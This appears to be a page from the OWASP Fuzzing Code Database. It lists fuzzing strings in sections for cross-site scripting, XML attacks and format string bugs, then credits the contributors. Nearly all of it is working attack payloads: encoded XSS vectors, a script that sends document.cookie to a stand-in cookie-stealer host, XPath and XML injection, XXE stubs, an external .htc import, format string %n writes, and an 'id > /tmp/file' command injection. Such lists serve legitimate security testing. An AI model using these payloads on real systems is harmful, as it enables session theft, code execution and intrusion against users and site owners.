<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E "> document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} '';!--<XSS>=&{}"

XML Attacks - (Update: 11 August 2009 - Total Statements: 15)
Statements count(/child::node) x' or name='username' or 'x'='y ','')); phpinfo; exit;/* <![CDATA[ var n=0;while(true){n++;} ]]> <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> "<?xml version=""1.0"" encoding=""ISO-8859-1""?> <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> " "<?xml version=""1.0"" encoding=""ISO-8859-1""?> <![CDATA[' or 1=1 or ''=']]> " "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo > &xxe; " "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo > &xxe; " "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo > &xxe; " "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo > &xxe; " "<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>" "<xml ID=""xss""><I><B>&lt;IMG SRC=""javascript:alert('XSS')""&gt;</B></I> <SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" "<xml SRC=""xsstest.xml"" ID=I> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" "<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"

Format String Statements - (Update: xx/xx/xx - Total Statements: 28)
%s%p%x%d .1024d %.2049d %p%p%p%p %x%x%x%x %d%d%d%d %s%s%s%s %99999999999s %08x %%20d %%20n %%20x %%20s %s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% f(x)=%s x 123 f(x)=%x x 255 %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` `perl -e 'print ".%p" x 80'`%n %08x.%08x.%08x.%08x.%08x\n XXX0_%08x.%08x.%08x.%08x.%08x\n %.16705u%2\$hn \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
 * id > /tmp/file; exit;

Project Contributor
Project Leader: Wagner Elias

Reviewer: Eduardo Neves

Contributor: Ulisses Castro

Feedback and Participation
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org